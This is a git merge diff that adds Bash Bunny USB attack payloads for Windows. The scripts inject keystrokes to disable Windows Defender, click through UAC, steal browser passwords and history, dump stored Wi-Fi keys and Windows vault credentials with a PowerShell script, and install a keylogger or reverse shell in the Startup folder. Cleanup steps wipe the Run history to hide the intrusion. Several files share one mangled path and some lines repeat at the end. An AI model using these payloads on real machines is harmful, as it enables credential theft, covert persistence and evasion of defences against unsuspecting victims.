Merge 95808c82ea into 9bc2a0312d

2024-10-02 14:27:16 -04:00 · 2024-10-02 14:27:16 -04:00 · e57083bd33
parent 9bc2a0312d 95808c82ea
commit e57083bd33
15 changed files with 711 additions and 0 deletions
--- a/payloads/library/KeyHopper/GetDrive.ps1
+++ b/payloads/library/KeyHopper/GetDrive.ps1
@ -0,0 +1 @@
+(gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip
--- a/payloads/library/KeyHopper/payload.txt
+++ b/payloads/library/KeyHopper/payload.txt
@ -0,0 +1,69 @@
+#!/bin/bash
+
+#KeyHopper
+#Spawns a keylogger and adds it to shell:startup
+
+#Delay CONFIGURATION
+#Edit the lines below to change the standard delays in the script
+#SFD = Super Fast delay (waiting for CTRL v for example) FASTMODE(standard)=100 SLOWMODE=500
+SFD="100"
+#FD = Fast delay (waiting for CTRL v for example) FASTMODE(standard)=500 SLOWMODE=1000
+FD="500"
+#ND = Normal delay (waiting for programs to shut off) FASTMODE(standard)=1000 SLOWMODE=2000
+ND="1000"
+#LD = Long delay (waiting for programs to start or bash scipts to execute) FASTMODE(standard)=1500 SLOWMODE=3500
+LD="1500"
+
+#KeyloggerName CONFIGURATION
+name=servicehost.txt
+
+#Shutting off CONFIGURATION
+#Edit the line below to shut the bunny off after finishing ("" = turn off / "#" = Do not turn off)
+AM="#"
+
+#Editing text below this line may prevent the script from working! (Except for changing servicehost.txt)
+
+#Setup
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+#Wait for the computer to recognise the drive etc
+Q delay $LD
+Q delay $LD
+Q delay $LD
+#Get drive letter and copy it:
+RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')"
+Q DELAY $ND
+
+
+#Copy keylogger and add it to shell:startup
+LED STAGE4
+Q GUI r
+Q DELAY $SFD
+Q STRING powershell
+Q ENTER
+Q DELAY $FD
+Q STRING copy
+Q SPACE
+Q DELAY $ND
+Q CONTROL v
+Q DELAY $FD
+Q BACKSPACE
+Q DELAY $FD
+Q STRING "payloads\\"$name" 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
+Q ENTER
+Q DELAY $FD
+Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$name"\'"
+Q DELAY $SFD
+Q ENTER
+Q ALT F4
+Q DELAY $LD
+Q DELAY $LD
+
+#Cleaning up fase
+LED CLEANUP
+RUN WIN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+Q ENTER
+
+LED FINISH
+$AM ATTACKMODE OFF
--- a/payloads/library/KeyHopper/readme.md
+++ b/payloads/library/KeyHopper/readme.md
@ -0,0 +1,31 @@
+# KeyHopper
+* Written by: C1PH3R
+* Creds: C1PH3R
+* Target: Windows
+
+# Description:
+
+# Does the following:
+
+- [x] Start's a keylogger and copy's it to shell:startup
+
+
+# Configuration:
+* Download/make a keylogger using whatever program you want (sAINT for example)
+* Place a file whatever.whatever in Bashbunny/payloads
+* Edit the "Reverse shell name CONFIGURATION" in the payload file to the name you chose for your reverse_shell
+* Optional: edit the "Delay CONFIGURATION" in payload file to your preferences to make the payload work with slower/older or faster/newer computers
+* Optional: edit the "Shutting off CONFIGURATION" in the payload file to shut the bunny off after the payload is done
+
+
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Amber              | Attack Setup                                 |
+| Stage (blinking)   | Bussy (do not remove stick)                  |
+| Green              | Attack Complete                              |
+| Red                | Fail                                         |
+
+* No discussion jet!
+
+# "Don't look at the branch of the problem, look at the root! (C1PH3R)"
--- a/payloads/library/USB
+++ b/payloads/library/USB
@ -0,0 +1 @@
+-WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
--- a/payloads/library/USB
+++ b/payloads/library/USB
@ -0,0 +1 @@
+(gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip
--- a/PWNR/Payloads-Readme-s/payload-files.txt
+++ b/PWNR/Payloads-Readme-s/payload-files.txt
@ -0,0 +1,9 @@
+You can find the payload files at:
+
+BPG: https://github.com/CIPH3R0/BashBunny/tree/master/BPG
+
+BHG: https://github.com/CIPH3R0/BashBunny/tree/master/BHG
+
+InfoGrabber: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber
+
+Reverse-shell: https://github.com/CIPH3R0/BashBunny/tree/master/Reverse-Shell
--- a/PWNR/Payloads-Readme-s/readme-BHG.md
+++ b/PWNR/Payloads-Readme-s/readme-BHG.md
@ -0,0 +1,21 @@
+# BPG (BrowserHistoryGrabber)
+
+* Author: speedy22013
+* Creds: speedy22013, Nirsoft
+* Target: Windows
+
+## Description
+
+Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 
+This payload is quick and takes about 15 seconds after insertion
+
+#No configuration needed
+
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Amber              | Attack Setup                                 |
+| Green              | Attack Complete                              |
+
+#No discussion jet!
+
--- a/PWNR/Payloads-Readme-s/readme-BPG.md
+++ b/PWNR/Payloads-Readme-s/readme-BPG.md
@ -0,0 +1,21 @@
+# BPG (BrowserPasswordGrabber)
+
+* Author: speedy22013
+* Creds: speedy22013, Nirsoft
+* Target: Windows
+
+## Description
+
+Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 
+This payload is quick and takes about 15 seconds after insertion
+
+#No configuration needed
+
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Amber              | Attack Setup                                 |
+| Green              | Attack Complete                              |
+
+#No discussion jet!
+
--- a/PWNR/Payloads-Readme-s/readme-InfoGrabber.md
+++ b/PWNR/Payloads-Readme-s/readme-InfoGrabber.md
@ -0,0 +1,82 @@
+# Info Grabber for the BashBunny
+
+Original Author Simen Kjeserud
+
+V2.0 Author: DannyK999
+
+Version: Version 2.0
+
+Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
+
+
+               ((`\
+            ___ \\ '--._
+         .'`   `'    o  )
+        /    \   '. __.'
+       _|    /_  \ \_\_
+      {_\______\-'\__\_\
+	  Check out Simen's website:
+	  aknemis.com
+
+## Description
+
+Gather a lot of information about the computer and place it in a text file in loot/info/.
+
+Updates include code/output cleanup, faster runtime, and more veiled execution.
+
+Here you can se what it will look like:
+
+
+	System Information for:  DESKTOP-9BVPPVN
+
+	Manufacturer: Dell Inc.
+
+	Model: XPS 13 9360
+
+	Serial Number: *******
+
+	CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz
+
+	HDD Capacity: 464.38GB
+
+	HDD Space: 82.32 % Free (382.28GB)
+	
+	RAM: 15.89GB
+
+	Operating System: Microsoft Windows 10 Home, Service Pack: 0
+
+	User logged In: DESKTOP-9BVPPVN\aknem
+
+	Last Reboot: 02/21/2017 19:49:30
+
+	Computers MAC adress: ****************
+
+	Computers IP adress: ***********
+
+	Public IP adress: ****************
+
+	RDP: RDP is NOT enabled
+
+
+	| ProfileName      | SSID                                  | Password                              |
+	| ---------------- | ------------------------------------- | ------------------------------------- |
+	| privatsna11234   | privatsna11234                        | ********                              |
+	| privatsna11234   | privatsna11234                        | ********                              |
+
+
+
+## Configuration
+
+Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Purple (blinking)| Attack in progress                    |
+| Green            | Attack Finished                       |
+
+
+
+## Discussion (Not yet created)
+[Hak5 Forum Thread not yet created](https://forums.hak5.org/index.php?/topic/ "Hak5 Forum Thread") 
--- a/PWNR/Payloads-Readme-s/readme-reverse-shell.md
+++ b/PWNR/Payloads-Readme-s/readme-reverse-shell.md
@ -0,0 +1,23 @@
+# Reverse-Shell
+
+* Author: speedy22013
+* Creds: speedy22013
+* Target: Windows
+
+## Description
+
+Copy's the file servicehost.txt to startup directory: shell:startup and executes it.
+
+##Configruation
+#Place a file servicehost.whatever in Bashbunny/payloads
+#Replace the text: servicehost.txt in payload.txt as well as in the copy-reverse.txt file with servicehost.whatever
+#(Whatever) = the filetype you have selected as your reverse shell
+
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Amber              | Attack Setup                                 |
+| Green              | Attack Complete                              |
+
+#No discussion jet!
+
--- a/PWNR/disable-anti-virus.ps1
+++ b/PWNR/disable-anti-virus.ps1
@ -0,0 +1,3 @@
+if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit }
+
+Set-MpPreference -DisableRealtimeMonitoring $true
--- a/payloads/library/USB
+++ b/payloads/library/USB
@ -0,0 +1,190 @@
+# Shows details of currently running PC
+# Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)
+
+#Get info about pc
+
+# Get IP / Nework Info
+try
+{
+$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
+}
+catch
+{
+$computerPubIP="Error getting Public IP"
+}
+$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
+$IsDHCPEnabled = $false
+$Networks =  Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
+foreach ($Network in $Networks) {
+If($network.DHCPEnabled) {
+$IsDHCPEnabled = $true
+  }
+[string[]]$computerMAC =$Network.MACAddress
+}
+
+#Get System Info
+$computerSystem = Get-CimInstance CIM_ComputerSystem
+$computerBIOS = Get-CimInstance CIM_BIOSElement
+
+$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory  | Format-List
+$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
+$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List
+
+$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
+$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table
+
+# Get HDDs
+$driveType = @{
+   2="Removable disk "
+   3="Fixed local disk "
+   4="Network disk "
+   5="Compact disk "}
+$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }
+
+# Check RDP
+$RDP
+if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { 
+	$RDP = "RDP is Enabled" 
+} else {
+	$RDP = "RDP is NOT enabled" 
+}
+
+# Get Network Interfaces
+$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null }  | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 
+
+# Get wifi SSIDs and Passwords	
+$WLANProfileNames =@()
+#Get all the WLAN profile names
+$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
+#Trim the output to receive only the name
+Foreach($WLANProfileName in $Output){
+    $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
+}
+$WLANProfileObjects =@()
+#Bind the WLAN profile names and also the password to a custom object
+Foreach($WLANProfileName in $WLANProfileNames){
+    #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
+    try{
+        $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
+    }Catch{
+        $WLANProfilePassword = "The password is not stored in this profile"
+    }
+    #Build the object and add this to an array
+    $WLANProfileObject = New-Object PSCustomobject 
+    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
+    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
+    $WLANProfileObjects += $WLANProfileObject
+    Remove-Variable WLANProfileObject
+}
+
+# local-user
+$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID
+
+# process first
+$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
+
+# Get Listeners / ActiveTcpConnections
+$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
+$listener = $listener | foreach-object {
+    $listenerItem = $_
+    $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
+    new-object PSObject -property @{
+      "LocalAddress" = $listenerItem.LocalAddress
+      "RemoteAddress" = $listenerItem.RemoteAddress
+      "State" = $listenerItem.State
+      "AppliedSetting" = $listenerItem.AppliedSetting
+      "OwningProcess" = $listenerItem.OwningProcess
+      "ProcessName" = $processItem.ProcessName
+    }
+} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table 
+
+# process last
+$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine
+
+# service
+$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName
+
+# installed software (get uninstaller)
+$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } |  Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize
+
+# drivers
+$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion
+
+# videocard
+$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
+
+#Get stored passwords
+[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
+$vault = New-Object Windows.Security.Credentials.PasswordVault 
+$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
+
+#The output
+Clear-Host
+Write-Host 
+
+$computerSystem.Name
+"=================================================================="
+"Manufacturer: " + $computerSystem.Manufacturer
+"Model: " + $computerSystem.Model
+"Serial Number: " + $computerBIOS.SerialNumber
+""
+""
+""
+
+"OS:"
+"=================================================================="+ ($computerOs| out-string)
+
+"CPU:"
+"=================================================================="+ ($computerCpu| out-string)
+
+"RAM:"
+"=================================================================="
+"Capacity: " + $computerRamCapacity+ ($computerRam| out-string)
+
+"Mainboard:"
+"=================================================================="+ ($computerMainboard| out-string)
+
+"Bios:"
+"=================================================================="+ (Get-WmiObject win32_bios| out-string)
+
+
+
+"Local-user:"
+"=================================================================="+ ($luser| out-string)
+
+"HDDs:"
+"=================================================================="+ ($Hdds| out-string)
+
+"Network: "
+"=================================================================="
+"Computers MAC address: " + $computerMAC
+"Computers IP address: " + $computerIP.ipaddress[0]
+"Public IP address: " + $computerPubIP  
+"RDP: " + $RDP
+""
+($Network| out-string)
+
+"W-Lan profiles: "
+"=================================================================="+ ($WLANProfileObjects| out-string)
+
+"listeners / ActiveTcpConnections"
+"=================================================================="+ ($listener| out-string)
+
+"Current running process: "
+"=================================================================="+ ($process| out-string)
+
+"Services: "
+"=================================================================="+ ($service| out-string)
+
+"Installed software:"
+"=================================================================="+ ($software| out-string)
+
+"Installed drivers:"
+"=================================================================="+ ($drivers| out-string)
+
+"Installed videocards:"
+"==================================================================" + ($videocard| out-string)
+
+"Windows/user passwords"
+"=================================================================="
+$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize
--- a/payloads/library/USB
+++ b/payloads/library/USB
@ -0,0 +1,170 @@
+#!/bin/bash
+
+#USB PWNR
+#P0WNS a computer in seconds
+
+#CONFIGURATION BELOW!!!
+
+#Delay CONFIGURATION
+#Edit the lines below to change the standard delays in the script
+#SFD = Super Fast delay (waiting for CTRL v for example) FASTMODE(standard)=100 SLOWMODE=500
+SFD="100"
+#FD = Fast delay (waiting for CTRL v for example) FASTMODE(standard)=500 SLOWMODE=1000
+FD="500"
+#ND = Normal delay (waiting for programs to shut off) FASTMODE(standard)=1000 SLOWMODE=2000
+ND="1000"
+#LD = Long delay (waiting for programs to start or bash scipts to execute) FASTMODE(standard)=1500 SLOWMODE=3500
+LD="1500"
+
+#Reverse shell CONFIGURATION
+#Edit the line below to copy a reverse shell and execute it or not ("#" = Not copy/execute "" = do copy and execute)
+RS="#"
+
+#Reverse shell name CONFIGURATION
+name=servicehost.txt
+
+#Target ip CONFIGURATION
+#Edit the line below if you want to get the targets IP ("#" = Do not save target ip "" = save target ip)
+TP="#"
+
+#Shutting off CONFIGURATION
+#Edit the line below to shut the bunny off after finishing ("" = turn off / "#" = Do not turn off)
+AM="#"
+
+#Editing text below this line may prevent the script from working!
+
+#Setup
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+GET TARGET_IP
+#Wait for the computer to recognise the drive etc
+Q delay $LD
+Q delay $LD
+Q delay $LD
+#Disable AntiVirus (Windows Defender)
+RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"
+#Bypass UAC
+Q DELAY $ND
+Q LEFT
+Q ENTER
+#Get drive letter and copy it:
+RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')"
+Q DELAY $ND
+
+#InfoGrabber
+LED STAGE1
+RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
+DELAY $LD
+
+#BPG (BrowserPasswordGrabber)
+LED STAGE2
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\pass.exe')"
+Q DELAY $LD
+Q CONTROL a
+Q DELAY $FD
+Q CONTROL s
+Q DELAY $FD
+Q STRING %computername% - Pass
+Q F4
+Q DELAY $SFD
+Q CONTROL a
+Q DELAY $SFD
+Q CONTROL v
+Q DELAY $SFD
+Q STRING 'loot\USB_PWNR'
+Q DELAY $SFD
+Q ENTER
+Q DELAY $FD
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q ENTER
+Q DELAY $SFD
+Q ALT F4
+
+#BHG (BrowserHistoryGrabber)
+LED STAGE 3
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\history.exe')"
+Q DELAY $LD
+Q ENTER
+Q DELAY $LD
+Q DELAY $LD
+Q CONTROL a
+Q DELAY $FD
+Q CONTROL s
+Q DELAY $FD
+Q STRING %computername% - History
+Q F4
+Q DELAY $SFD
+Q CONTROL a
+Q DELAY $SFD
+Q CONTROL v
+Q DELAY $SFD
+Q STRING 'loot\USB_PWNR'
+Q DELAY $SFD
+Q ENTER
+Q DELAY $FD
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q ENTER
+Q DELAY $SFD
+Q ALT F4
+
+#Copy reverse shell file to shell:startup and start it
+LED STAGE4
+Q GUI r
+Q DELAY $SFD
+Q STRING powershell
+Q ENTER
+Q DELAY $FD
+$RS Q STRING copy
+$RS Q SPACE
+$RS Q DELAY $ND
+$RS Q CONTROL v
+$RS Q DELAY $FD
+$RS Q BACKSPACE
+$RS Q DELAY $FD
+$RS Q STRING "payloads\\"$name" 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
+$RS Q ENTER
+$RS Q DELAY $FD
+$RS Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$name"\'"
+$RS Q DELAY $SFD
+$RS Q ENTER
+$RS Q DELAY $LD
+$RS Q DELAY $LD
+
+# Get Target IP
+$TP Q STRING cd
+$TP Q SPACE
+$TP Q CONTROL v
+$TP Q BACKSPACE
+$TP Q STRING '\loot'
+$TP Q ENTER
+$TP Q DELAY $SFD
+$TP Q STRING '$ipV4 = Test-Connection -ComputerName (hostname) -Count 1  | Select IPV4Address >>'
+$TP Q SPACE
+$TP Q CNTRL v
+$TP Q DELAY $SFD
+$TP Q BACKSPACE
+$TP Q STRING '\loot\USB_PWNR\ip.txt'
+$TP Q ENTER
+$TP Q DELAY $SFD
+Q STRING exit
+Q ENTER
+Q DELAY $SFD
+
+#Cleaning up fase
+LED CLEANUP
+RUN WIN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+Q ENTER
+
+LED FINISH
+$AM ATTACKMODE OFF
--- a/payloads/library/USB
+++ b/payloads/library/USB
@ -0,0 +1,48 @@
+# USB PWNR V2
+
+`````
+   __  _______ ____     ____ _       ___   ______ 
+  / / / / ___// __ )   / __ \ |     / / | / / __ \
+ / / / /\__ \/ __  |  / /_/ / | /| / /  |/ / /_/ /
+/ /_/ /___/ / /_/ /  / ____/| |/ |/ / /|  / _, _/ 
+\____//____/_____/  /_/     |__/|__/_/ |_/_/ |_|
+
+`````
+
+* Written by: C1PH3R
+* Creds: C1PH3R, Hak5Darren, Nirsoft
+* Target: Windows
+
+# Description:
+
+# Starts up multiple programs: 
+
+- [x] BPG (BrowserPasswordGrabber): Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 
+- [x] BHG (BrowserHistoryGrabber): Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 
+- [x] InfoGrabber: Gather a lot of information about the computer and place it in a text file in loot/info/.
+- [x] Reverse-Shell: Copy's the file servicehost.txt to startup directory: shell:startup and executes it.
+- [x] Ip grabber.
+
+# Configuration:
+* Required: download the binary files and put them in the switch position you chose:
+https://github.com/CIPH3R0/BashBunny/tree/master/Binary-s/USB%20PWNR
+* Optional: edit the "Delay CONFIGURATION" in payload file to your preferences to make the payload work with slower/older or faster/newer computers
+* Optional: edit the "Shutting off CONFIGURATION" in the payload file to shut the bunny off after the payload is done
+* Optional: edit the "Target ip CONFIGURATION" in the payload file to grab the ip of the victim
+* Optional: edit the "Reverse shell CONFIGURATION" in the payload file to use reverse_shell
+* When using a reverse_shell follow steps below
+* Place a file whatever.whatever in Bashbunny/payloads
+* Edit the "Reverse shell name CONFIGURATION" in the payload file to the name you chose for your reverse_shell
+
+
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Amber              | Attack Setup                                 |
+| Stage (blinking)   | Bussy (do not remove stick)                  |
+| Green              | Attack Complete                              |
+| Red                | Fail                                         |
+
+* No discussion jet!
+
+# "Don't look at the branch of the problem, look at the root! (C1PH3R)"
--- a/payloads/library/USB
+++ b/payloads/library/USB
@ -0,0 +1,41 @@
+#Remove run history
+powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+
+#Get the path and file name that you are using for output
+# find connected bashbunny drive:
+$VolumeName = "bashbunny"
+$computerSystem = Get-CimInstance CIM_ComputerSystem
+$backupDrive = $null
+get-wmiobject win32_logicaldisk | % {
+    if ($_.VolumeName -eq $VolumeName) {
+        $backupDrive = $_.DeviceID
+    }
+}
+
+#See if a loot folder exist in usb. If not create one
+$TARGETDIR = $backupDrive + "\loot"
+if(!(Test-Path -Path $TARGETDIR )){
+    New-Item -ItemType directory -Path $TARGETDIR
+}
+
+#See if a info folder exist in loot folder. If not create one
+$TARGETDIR = $backupDrive + "\loot\info"
+if(!(Test-Path -Path $TARGETDIR )){
+    New-Item -ItemType directory -Path $TARGETDIR
+}
+
+#See if a USB_PWNR folder exist in loot folder. If not create one
+$TARGETDIR = $backupDrive + "\loot\USB_PWNR"
+if(!(Test-Path -Path $TARGETDIR )){
+    New-Item -ItemType directory -Path $TARGETDIR
+}
+
+#Create a path that will be used to make the file
+$datetime = get-date -f yyyy-MM-dd_HH-mm
+$backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"
+
+#Create output from info script
+$TARGETDIR = $MyInvocation.MyCommand.Path
+$TARGETDIR = $TARGETDIR -replace ".......$"
+cd $TARGETDIR
+PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath
				`@ -0,0 +1 @@`
				`(gwmi -class win32_volume -filter "label='BashBunny'").Name \| Clip`
				`@ -0,0 +1 @@`
				`-WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"`